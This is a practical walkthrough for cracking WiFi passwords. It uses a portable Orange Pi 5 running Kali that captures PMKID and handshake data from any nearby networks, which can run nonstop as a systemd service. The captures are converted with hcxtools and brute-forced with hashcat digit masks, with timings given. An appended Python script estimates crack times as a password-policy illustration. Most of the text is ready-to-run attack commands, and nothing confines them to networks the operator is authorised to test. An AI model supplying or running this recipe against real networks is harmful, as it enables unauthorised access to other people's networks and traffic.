Simple WiFi pentest
Hardware
Orange Pi 5 + TP-Link Archer T2U PLUS [RTL8821AU]
The OS is Kali Linux. Don't forget to run
rm /boot/*cloud-arm64* && /usr/sbin/u-boot-update
after apt update && apt upgrade, otherwise the board can't boot after a reboot. In my case, the main reason for the wrong kernel appearing was apt install wireguard. As you can see:
└─# apt depends wireguard
wireguard
|Depends: <wireguard-modules> (>= 0.0.20191219)
linux-image-arm64
linux-image-cloud-arm64
wireguard-modules is a virtual package that either linux-image-arm64 or linux-image-cloud-arm64 can satisfy, so apt may pull in the cloud kernel image, which does not boot on this board.
You can use it anywhere with a power bank.
Some computer with a video card
In my case it’s Gentoo with GeForce RTX 3070 Lite Hash Rate
Orange Pi 5
Prepare
apt update
apt install tshark hcxdumptool hcxtools iw bettercap
Exclude wlan0 from NetworkManager
Update /etc/NetworkManager/NetworkManager.conf and restart NetworkManager:
[main]
plugins=ifupdown,keyfile
[ifupdown]
managed=false
[keyfile]
unmanaged-devices=interface-name:wlan0
Run
# Setup monitor mode
ip link set wlan0 down && iw wlan0 set monitor none && ip link set wlan0 up
# Start the capture; this invocation is for hcxdumptool 6.3.1 (C) 2023 ZeroBeat
hcxdumptool -i wlan0 -w wlan0.pcapng
# wait
You can use a systemd service like this (create /var/log/wifi-dump first, since both the mv in ExecStartPre and hcxdumptool write there):
[Unit]
Description=WiFi scan
[Service]
Type=simple
Environment=TERM=xterm
ExecStartPre=/usr/bin/ip link set wlan0 down
ExecStartPre=/usr/sbin/iw wlan0 set monitor none
ExecStartPre=/usr/bin/ip link set wlan0 up
ExecStartPre=-/usr/bin/bash -c '/usr/bin/mv /var/log/wifi-dump/wlan0.pcapng /var/log/wifi-dump/wlan0-$(date +%%Y%%m%%d-%%H%%M%%S).pcapng'
ExecStart=/usr/bin/bash -c 'TERM=xterm; /usr/bin/hcxdumptool -i wlan0 -w /var/log/wifi-dump/wlan0.pcapng'
Restart=always
RestartSec=30
[Install]
WantedBy=multi-user.target
After (or during) the wait:
# Convert the capture to hc22000 format; look at the 'PMKID (best)' line in the summary
hcxpcapngtool -o wlan0.hc22000 wlan0.pcapng
# Get info from wlan0.hc22000
hcxhashtool -i wlan0.hc22000 --info=stdout
You can run something like this at the same time to watch in real time:
bettercap -iface wlan0 -eval 'wifi.recon on; set ticker.period 5; set ticker.commands "wifi.show"; ticker on'
Gentoo
Prepare
eselect repository enable pentoo
eix-sync
eix-update
emerge hcxtools
Try to find something interesting
Simple and stupid brute force over all digit strings from 000000000 (minimal WiFi password length) to 999999999999 (like a mobile phone number); note that the mask below actually covers lengths 8 to 11 (--increment-min 8, --increment-max 11).
hashcat -m 22000 wlan0.hc22000 -a3 --increment -w3 \
--increment-max 11 \
--increment-min 8 \
'?d?d?d?d?d?d?d?d?d?d?d'
# press s to check status
# run at any time to show what has been found so far
hashcat -m 22000 wlan0.hc22000 --show
Timings:
- 8 digits ~ 18 minutes
- 9 digits ~ 3 hours
- 10 digits ~ 1 day, 5 hours
- 11 digits ~ 12 days, 9 hours
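As an added example (not part of the original post), the following Python estimates keyspaces and worst-case run times for hashcat masks at the throughput implied by the timings above. The rate is an assumption derived from the 8-digit figure (10^8 candidates in ~18 minutes on the RTX 3070 LHR, roughly 92,600 candidates/s); it goes beyond the page's digit-only case by also sizing a random 8-character ?a password, so a network owner can see which PSK shapes this attack actually threatens.

```python
# Added example: keyspace/run-time estimator for the hashcat mask attack above.
# RATE_PER_SECOND is an assumption from the page's timing (10**8 candidates in ~18 min).
RATE_PER_SECOND = 10**8 / (18 * 60)  # ~92,600 WPA candidates per second on the RTX 3070 LHR

# Sizes of hashcat's built-in charsets; ?a is ?l + ?u + ?d + ?s (26+26+10+33 = 95).
CHARSETS = {"?d": 10, "?l": 26, "?u": 26, "?s": 33, "?a": 95}

def tokenize(mask: str) -> list:
    """Split '?d?d?d' into charset tokens; any other character is a literal."""
    tokens, i = [], 0
    while i < len(mask):
        if mask[i] == "?":
            tok = mask[i:i + 2]
            if tok not in CHARSETS:
                raise ValueError(f"unsupported charset {tok!r}")
            tokens.append(tok)
            i += 2
        else:
            tokens.append(mask[i])
            i += 1
    return tokens

def keyspace(mask: str, inc_min: int = 0, inc_max: int = 0) -> int:
    """Candidates for a mask. With inc_min/inc_max it sums every prefix length,
    mirroring '--increment --increment-min 8 --increment-max 11' from the page."""
    tokens = tokenize(mask)
    lengths = range(inc_min, inc_max + 1) if inc_max else [len(tokens)]
    total = 0
    for n in lengths:
        size = 1
        for tok in tokens[:n]:
            size *= CHARSETS.get(tok, 1)  # a literal character adds no choice
        total += size
    return total

def seconds_to_crack(mask, inc_min=0, inc_max=0, rate=RATE_PER_SECOND) -> float:
    """Worst-case seconds to exhaust the keyspace at `rate` candidates per second."""
    return keyspace(mask, inc_min, inc_max) / rate

def human(seconds: float) -> str:
    """Render seconds as 'Xd Yh Zm' for a quick password-policy comparison."""
    minutes, _ = divmod(int(seconds), 60)
    hours, minutes = divmod(minutes, 60)
    days, hours = divmod(hours, 24)
    return f"{days}d {hours}h {minutes}m"

if __name__ == "__main__":
    print("page's digit mask, lengths 8-11:", human(seconds_to_crack("?d" * 11, 8, 11)))
    print("random 8-char ?a password:      ", human(seconds_to_crack("?a" * 8)))
```

The digit-only sweep finishes in about two weeks at this rate, while a random 8-character mixed password would take thousands of years, which is the policy point behind the timings above.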